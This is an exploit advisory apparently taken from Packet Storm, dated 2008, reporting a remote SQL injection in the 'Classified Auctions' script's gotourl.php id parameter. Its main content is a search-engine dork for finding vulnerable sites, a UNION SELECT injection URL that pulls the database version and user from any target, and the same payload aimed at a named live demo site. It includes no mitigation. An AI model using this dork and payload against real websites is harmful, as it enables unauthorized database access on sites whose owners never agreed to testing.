pozscriptsauctions-sql.txt

2008-10-27T00:00:00
ID PACKETSTORM:71232
Type packetstorm
Reporter Hussin X
Modified 2008-10-27T00:00:00

Description

                                        
                                            `|___________________________________________________  
|  
| Classified Auctions (gotourl.php id) Remote SQL Injection Vulnerability  
|  
|___________________________________________________  
|---------------- Hussin X ------------------  
|  
| Author: Hussin X  
|  
| Home : WwW.IQ-ty.CoM  
|  
| email: darkangel_g85[at]Yahoo[DoT]com  
|  
|___________________________________________________  
|  
| script : http://www.pozscripts.com/index.php  
|  
| DorK : inurl:gotourl.php?id=  
|___________________________________________________  
  
Exploit:  
________  
  
  
www.[target].com/Script/gotourl.php?id=-30+union+select+concat(version(),user())--  
  
  
Demo:  
________  
  
http://www.singwebs.com/auction_demo/gotourl.php?id=-30+union+select+concat(version(),user())--  
  
  
  
________________( Greetz )_____________________  
_____ ____ __ __ _ ____   
|_ _| | _ \ \ \ / / / \ / ___|  
| | | |_) | \ V / / _ \ | | _  
| | | _ < | | / ___ \ | |_| |  
|_| |_| \_\ |_| /_/ \_\ \____|  
`